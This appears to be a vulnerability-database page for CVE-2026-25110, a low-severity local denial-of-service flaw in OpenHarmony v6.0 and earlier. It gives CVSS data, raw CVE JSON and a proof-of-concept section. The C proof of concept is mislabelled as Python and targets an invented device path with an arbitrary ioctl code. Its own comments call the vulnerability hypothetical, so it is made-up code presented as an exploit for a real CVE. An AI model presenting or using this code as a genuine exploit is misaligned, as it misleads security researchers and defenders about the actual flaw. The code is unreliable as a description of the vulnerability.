Security Vulnerability Report
中文
CVE-2026-25110 CVSS 3.3 LOW

CVE-2026-25110

Published: 2026-05-19 04:16:28
Last Modified: 2026-05-19 14:25:04

Description

in OpenHarmony v6.0 and prior versions allow a local attacker cause DOS.

CVSS Details

CVSS Score
3.3
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

OpenHarmony <= v6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> // PoC for CVE-2026-25110 // This code simulates a local DoS trigger in OpenHarmony // by exploiting a hypothetical vulnerability in a system service. int main() { int fd; char *evil_payload = NULL; // Attempt to open a vulnerable device or service interface fd = open("/dev/sys_vulnerable_service", O_RDWR); if (fd < 0) { perror("[-] Failed to open target device"); return 1; } printf("[*] Triggering vulnerability in OpenHarmony..."); // Trigger the logic flaw that causes the crash // Passing NULL pointer to an IOCTL that lacks validation ioctl(fd, 0x8001, evil_payload); printf("[+] Exploit sent. If successful, the service should crash."); close(fd); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25110", "sourceIdentifier": "[email protected]", "published": "2026-05-19T04:16:28.137", "lastModified": "2026-05-19T14:25:04.340", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "in OpenHarmony v6.0 and prior versions allow a local attacker cause DOS."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "references": [{"url": "https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-04.md", "source": "[email protected]"}]}}